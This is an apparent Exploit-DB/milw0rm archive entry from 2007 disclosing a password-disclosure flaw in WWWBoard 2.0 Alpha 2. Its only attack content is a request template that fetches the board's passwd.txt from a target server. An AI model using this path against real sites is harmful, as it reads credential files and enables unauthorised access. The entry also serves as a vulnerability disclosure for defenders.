WWWBoard 2.0 - 'passwd.txt' Remote Password Disclosure

EDB-ID:

3065


Author:

bd0rk

Type:

webapps


Platform:

CGI

Date:

2007-01-01


            WWWBoard 2.0 Alpha 2 (passwd.txt) Password Disclosure Vulnerability



Affected Software: WWWBoard 2.0 Alpha

Download: http://www.scriptarchive.com/wwwboard.html

Bugfounder: bd0rk

Contact: bd0rk[at]hackermail.com

Greetz: str0ke, Döner, TheJT, x0r_32

[+]Exploit: http://[target]/[www_board_path]/passwd.txt

# milw0rm.com [2007-01-01]